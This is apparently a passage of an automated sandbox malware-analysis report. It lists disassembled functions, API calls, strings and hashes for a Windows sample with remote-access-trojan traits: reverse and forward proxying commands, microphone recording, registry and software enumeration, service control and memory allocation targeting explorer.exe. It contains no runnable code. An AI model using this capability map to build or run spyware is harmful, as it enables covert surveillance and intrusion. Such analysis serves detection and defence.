                                              • Opcode ID: fdde0a3fba0e2e79fb92f6962f835a9100c7e8c667bc286140aaf21858552f70
                                              • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                              • Opcode Fuzzy Hash: fdde0a3fba0e2e79fb92f6962f835a9100c7e8c667bc286140aaf21858552f70
                                              • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                              Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetEvent.KERNEL32(?,?), ref: 004054BF
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                              • TranslateMessage.USER32(?), ref: 0040557E
                                              • DispatchMessageA.USER32(?), ref: 00405589
                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                              • API String ID: 2956720200-749203953
                                              • Opcode ID: 52e40677220340df766a1066c6eba0187cdd1e922d62033c57619962968f1fb1
                                              • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                              • Opcode Fuzzy Hash: 52e40677220340df766a1066c6eba0187cdd1e922d62033c57619962968f1fb1
                                              • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                              Function 00413D48 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 135registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEnumInfoOpenQuerysend
                                              • String ID: (aF$,aF$xUG$xdF$NG$NG$TG
                                              • API String ID: 3114080316-4028018678
                                              • Opcode ID: 882ff7e01c3d08ca6fdfa6cac83639225ac0c66ad9ccab99784801e0feb7fca5
                                              • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                              • Opcode Fuzzy Hash: 882ff7e01c3d08ca6fdfa6cac83639225ac0c66ad9ccab99784801e0feb7fca5
                                              • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                              Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                              • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                              • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                              • String ID: 0VG$0VG$<$@$Temp
                                              • API String ID: 1704390241-2575729100
                                              • Opcode ID: 80ffa916d59d600171d9ca3e34e0670cc9ac865161bbbc65e8436c0bee0f72cd
                                              • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                              • Opcode Fuzzy Hash: 80ffa916d59d600171d9ca3e34e0670cc9ac865161bbbc65e8436c0bee0f72cd
                                              • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                              Function 00410E9C Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75COMMON
                                              Download Yara Rule
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                              • int.LIBCPMT ref: 00410EBC
                                                • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                              • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                              • __Init_thread_footer.LIBCMT ref: 00410F64
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                              • String ID: ,kG$0kG$@!G
                                              • API String ID: 3815856325-312998898
                                              • Opcode ID: 234cc645e6f2b623d94fc8cb2d29f52bc734eee13d30ec18b0bfe81019bed365
                                              • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                              • Opcode Fuzzy Hash: 234cc645e6f2b623d94fc8cb2d29f52bc734eee13d30ec18b0bfe81019bed365
                                              • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                              Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: 096e2c87fc6c65f47e4c6c752a7259066b900e282f660f6c8049b8ab8b72f741
                                              • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                              • Opcode Fuzzy Hash: 096e2c87fc6c65f47e4c6c752a7259066b900e282f660f6c8049b8ab8b72f741
                                              • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                              Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 004481B5
                                                • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                              • _free.LIBCMT ref: 004481C1
                                              • _free.LIBCMT ref: 004481CC
                                              • _free.LIBCMT ref: 004481D7
                                              • _free.LIBCMT ref: 004481E2
                                              • _free.LIBCMT ref: 004481ED
                                              • _free.LIBCMT ref: 004481F8
                                              • _free.LIBCMT ref: 00448203
                                              • _free.LIBCMT ref: 0044820E
                                              • _free.LIBCMT ref: 0044821C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                              • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                              • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                              • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                              Function 004451FA Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 266COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                              • _memcmp.LIBVCRUNTIME ref: 004454A4
                                              • _free.LIBCMT ref: 00445515
                                              • _free.LIBCMT ref: 0044552E
                                              • _free.LIBCMT ref: 00445560
                                              • _free.LIBCMT ref: 00445569
                                              • _free.LIBCMT ref: 00445575
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorLast$_abort_memcmp
                                              • String ID: C$v%(/
                                              • API String ID: 1679612858-1886176806
                                              • Opcode ID: 05701d8adb5406d1562c14b31316c91fe53ace2ea37426e70e906b20dbb38a64
                                              • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                              • Opcode Fuzzy Hash: 05701d8adb5406d1562c14b31316c91fe53ace2ea37426e70e906b20dbb38a64
                                              • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                              Function 0041C720 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 214registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                              • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                              Strings
                                              • DisplayName, xrefs: 0041C7CD
                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C738
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEnumOpen
                                              • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                              • API String ID: 1332880857-3614651759
                                              • Opcode ID: 0758d2217d4cdf4be18b27332201ce298183b926a753a4e26667fde6bb3e7a3c
                                              • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                              • Opcode Fuzzy Hash: 0758d2217d4cdf4be18b27332201ce298183b926a753a4e26667fde6bb3e7a3c
                                              • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                              Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Eventinet_ntoa
                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                              • API String ID: 3578746661-3604713145
                                              • Opcode ID: 6e3468ae640a0ac899855ee624c8b62c6364f2bd00d9ee8107a4bc7941ae2f64
                                              • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                              • Opcode Fuzzy Hash: 6e3468ae640a0ac899855ee624c8b62c6364f2bd00d9ee8107a4bc7941ae2f64
                                              • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                              Function 0044B43C Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                              • __fassign.LIBCMT ref: 0044B4F9
                                              • __fassign.LIBCMT ref: 0044B514
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                              • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID: v%(/
                                              • API String ID: 1324828854-2435473048
                                              • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                              • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                              • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                              • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                              Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                              • Sleep.KERNEL32(00000064), ref: 0041755C
                                              • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CreateDeleteExecuteShellSleep
                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                              • API String ID: 1462127192-2001430897
                                              • Opcode ID: d0f70b8df9fe10b093b079c3319088e07b2679cc5b0ed1992e361cead8d3f0ee
                                              • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                              • Opcode Fuzzy Hash: d0f70b8df9fe10b093b079c3319088e07b2679cc5b0ed1992e361cead8d3f0ee
                                              • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                              Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
                                              • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe), ref: 004074D9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CurrentProcess
                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                              • API String ID: 2050909247-4242073005
                                              • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                              • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                              • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                              • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                              Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                              Download Yara Rule
                                              APIs
                                              • _strftime.LIBCMT ref: 00401D50
                                                • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                              • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                              • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                              • API String ID: 3809562944-243156785
                                              • Opcode ID: 272d9e95f202b5b87e8d6f02197a65f7d4795c5aee8df22827821352ca84ba3d
                                              • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                              • Opcode Fuzzy Hash: 272d9e95f202b5b87e8d6f02197a65f7d4795c5aee8df22827821352ca84ba3d
                                              • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                              Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                              • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                              • waveInStart.WINMM ref: 00401CFE
                                              Strings
                                              Memory Dump Source
